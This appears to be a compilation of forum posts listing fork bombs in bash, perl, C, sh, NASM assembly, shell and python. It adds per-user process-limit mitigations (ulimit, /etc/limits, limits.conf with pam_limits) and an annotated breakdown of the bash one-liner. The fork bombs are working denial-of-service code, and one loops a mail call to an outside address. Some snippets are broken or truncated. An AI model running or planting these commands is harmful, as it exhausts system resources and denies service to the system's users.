bash fork bomb:
:(){ :|:& };:
perl fork bomb:
(forking using the Perl interpreter):
perl -e "fork while fork" &
c fork bomb:
#include
int main(void) {
while(1) {
fork();
}
return 0;
}
c fork bomb:
main() {for(;;)fork();}
sh fork bomb:
$0 & $0 &
nasm (compile: nasm -f elf bomb.asm ; ld -s -o bomb bomb.o):
;The ebx paramater isn't needed
;"jmp SHORT" shaves an extra 3 bytes off
;"mov al, 2" shaves off another 3 (registers are initially 0)
section .text ; text segment
global _start ; make _start global
_start: ; _start here
mov al, 2 ; fork: system call number 1
int 0x80 ; interrupt. (call the kernel)
jmp SHORT _start ; jump to _start
unix shell:
while (1) { `echo "." | /usr/bin/mailx -s askme user@x.com`; fork(); }
python:
python -c 'while 1: __import__(os).fork()'
--------------------------------------------------------------------------------
ulimit -a
One way to prevent a fork bomb is to limit the number of processes that a single
user may own. When a process tries to create another process and the owner of that
process already owns more than the maximum, the creation fails. The maximum should
be low enough that if all the users who might simultaneously bomb a system do,
there are still enough resources left to avoid disaster. Note that an accidental
fork bomb is highly unlikely to involve more than one user.
Unix-type systems typically have such a limit, controlled by a ulimit shell
command. With a Linux kernel, it is the RLIMIT_NPROC rlimit of a process. If a
process tries to perform a fork and the user that owns that process already owns
more than RLIMIT_NPROC processes, it fails.
Note that simply limiting the number of processes a process may create does not
prevent a fork bomb, because each process that the fork bomb creates also creates
processes. A distributive resource allocation system in which a process' resources
are a share of its parents resources would work, but distributive resource systems
are not in common use.
Another solution involves the detection of fork bombs by the operating system,
which is not widely practiced although has been implemented in the form of a kernel
module for the Linux kernel
ulimit -u 20
ulimit -n 50
Would allow the user to create 20 processes and open 50 files. There are plenty
of options, check man ulimit or bash documentation. I don't know all of them :/
Then, once you have built up your mind, put it on /etc/bashrc, after checking who
is logged (if user !=root, set limits). Have fun. :)
I can see that under Debian, Redhat etc, where you have PAM, you can use pam_limit
which will enforce these limits on all sessions, which is good.
dunno for linux, but in openbsd you can configure maxproc in login.conf for
whichever login class you want to restrict.
--------------------------------------------------------------------------------
Limiting user processes is one way to make sure that one user can not "commandeer"
the system making it unusable for others. To limit the processes a user on your
system can we have two files to edit:
/etc/limits
owned by the sys-apps/shadow package
/etc/security/limits.conf
owned the the sys-libs/pam package : This only affects programs
affected by PAM, so the pam USE flag should be set.
/etc/limits
# This will limit all users to 40 processes max. This can be used to
# prevent a "fork bomb".
# Be warned, if the user logs into a Desktop Environment like GNOME or
# KDE, this could cause problems due to how many processes they launch.
* U 40
# Limit fred to logging in no more than twice. NOTE: This does not affect
# virtual terminals for some reason.
fred L 2
/etc/security/limits.conf
Most people prefer to edit this file because its more readable and offers
more flexibility. This file can also enforce both hard and soft limits.
Soft limits can be exceeded, and will usually issue a warning of some kind.
Hard limits can not. Also, unlike the other limits file, limits.conf can
match groups. To match a group, preceed the group name with a "@".
# Prevents anyone from dumping core files.
* hard core 0
# This will prevent anyone in the 'users' group from having more than 150
# processes, and a warning will be given at 100 processes.
@users soft nproc 100
@users hard nproc 150
And uncommented the following line from /etc/pam.d/login:
session required pam_limits.so
--------------------------------------------------------------------------------
bash fork bomb:
:(){ :|:& };:
It creates a function called ":" that accepts no arguments-- that's
the ":(){ ... }" part of the utterance.
The code in the function recursively calls the function
and pipes the output to another invocation of the function-- that's
the ":|:" part. The "&" puts the call into the background-- that way
the child process don't die if the parent exits or is killed. Note
that by invoking the function twice, you get exponential growth in
the number of processes (nasty!).
The trailing ";" after the curly brace finishes the function definition
and the last ":" is the first invocation of the function that sets off
the bomb.
. () { . | . & } ; .
0 1 2 3 4 5 6 7 8 9
0 - function name of our newly defined function
1 - parentheses declare a function with no (here optional) arguments
2 - block begins
3 - call self, the newly defined function (recursive)
4 - open a pipe to another process
5 - call self, the newly defined function (recursive)
6 - fork! (put the whole thing in the background)
7 - block ends
8 - end complex statement [ function declaration ]
9 - run that function!